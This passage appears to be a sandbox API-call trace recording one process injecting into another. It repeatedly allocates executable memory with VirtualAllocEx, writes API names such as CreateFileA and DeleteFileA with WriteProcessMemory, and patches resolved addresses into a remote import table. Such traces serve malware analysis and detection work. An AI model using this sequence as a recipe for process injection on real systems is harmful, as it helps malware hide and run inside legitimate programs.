	[0197.602] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca0a0, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.602] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.602] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.602] lstrlenA (lpString="FormatMessageW") returned 14
	[0197.602] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.602] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bbf5a*, nSize=0xf, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bbf5a*, lpNumberOfBytesWritten=0x12857c*=0xf) returned 1
	[0197.603] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.603] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.603] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.603] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.603] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.603] ResetEvent (hEvent=0x498) returned 1
	[0197.603] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.603] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.604] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.604] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.604] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.604] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca0a4, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.604] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.604] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.604] lstrlenA (lpString="GetDiskFreeSpaceA") returned 17
	[0197.604] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.604] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bbf6c*, nSize=0x12, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bbf6c*, lpNumberOfBytesWritten=0x12857c*=0x12) returned 1
	[0197.605] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.605] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.605] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.605] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.605] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.605] ResetEvent (hEvent=0x498) returned 1
	[0197.605] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.606] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.606] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.606] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.606] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.606] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca0a8, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.606] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.606] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.607] lstrlenA (lpString="GetFileAttributesA") returned 18
	[0197.607] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.607] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bbf80*, nSize=0x13, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bbf80*, lpNumberOfBytesWritten=0x12857c*=0x13) returned 1
	[0197.607] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.607] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.607] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.607] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.607] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.608] ResetEvent (hEvent=0x498) returned 1
	[0197.608] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.608] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.608] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.608] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.608] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.608] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca0ac, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.609] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.609] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.609] lstrlenA (lpString="GetFileAttributesExW") returned 20
	[0197.609] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.609] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bbf96*, nSize=0x15, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bbf96*, lpNumberOfBytesWritten=0x12857c*=0x15) returned 1
	[0197.609] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.609] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.609] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.609] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.610] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.610] ResetEvent (hEvent=0x498) returned 1
	[0197.610] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.610] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.610] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.610] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.610] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.610] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca0b0, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.611] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.611] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.611] lstrlenA (lpString="OutputDebugStringW") returned 18
	[0197.611] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.611] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bbfae*, nSize=0x13, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bbfae*, lpNumberOfBytesWritten=0x12857c*=0x13) returned 1
	[0197.611] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.611] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.611] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.611] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.612] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.612] ResetEvent (hEvent=0x498) returned 1
	[0197.612] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.612] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.612] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.612] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.612] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.612] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca0b4, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.613] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.613] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.613] lstrlenA (lpString="FlushViewOfFile") returned 15
	[0197.613] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.613] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bbfc4*, nSize=0x10, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bbfc4*, lpNumberOfBytesWritten=0x12857c*=0x10) returned 1
	[0197.613] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.613] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.614] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.614] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.614] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.614] ResetEvent (hEvent=0x498) returned 1
	[0197.614] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.614] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.614] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.614] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.615] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.615] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca0b8, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.615] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.615] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.615] lstrlenA (lpString="CreateFileA") returned 11
	[0197.615] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.615] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bbfd6*, nSize=0xc, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bbfd6*, lpNumberOfBytesWritten=0x12857c*=0xc) returned 1
	[0197.616] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.616] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.616] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.616] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.616] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.616] ResetEvent (hEvent=0x498) returned 1
	[0197.616] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.616] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.617] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.617] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.617] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.617] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca0bc, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.617] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.617] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.617] lstrlenA (lpString="WaitForSingleObjectEx") returned 21
	[0197.617] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.617] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bbfe4*, nSize=0x16, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bbfe4*, lpNumberOfBytesWritten=0x12857c*=0x16) returned 1
	[0197.618] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.618] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.618] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.618] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.618] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.618] ResetEvent (hEvent=0x498) returned 1
	[0197.618] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.619] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.619] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.619] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.619] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.619] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca0c0, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.619] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.619] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.619] lstrlenA (lpString="GetVersionExA") returned 13
	[0197.619] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.620] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bbffc*, nSize=0xe, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bbffc*, lpNumberOfBytesWritten=0x12857c*=0xe) returned 1
	[0197.620] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.620] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.620] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.620] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.620] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.621] ResetEvent (hEvent=0x498) returned 1
	[0197.621] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.621] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.621] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.621] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.621] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.621] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca0c4, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.622] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.622] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.622] lstrlenA (lpString="DeleteFileA") returned 11
	[0197.622] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.622] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bc00c*, nSize=0xc, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bc00c*, lpNumberOfBytesWritten=0x12857c*=0xc) returned 1
	[0197.622] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.622] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.622] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.622] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.623] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.623] ResetEvent (hEvent=0x498) returned 1
	[0197.623] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.623] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.623] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.623] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.623] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.623] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca0c8, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.624] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.624] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.624] lstrlenA (lpString="DeleteFileW") returned 11
	[0197.624] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.624] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bc01a*, nSize=0xc, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bc01a*, lpNumberOfBytesWritten=0x12857c*=0xc) returned 1
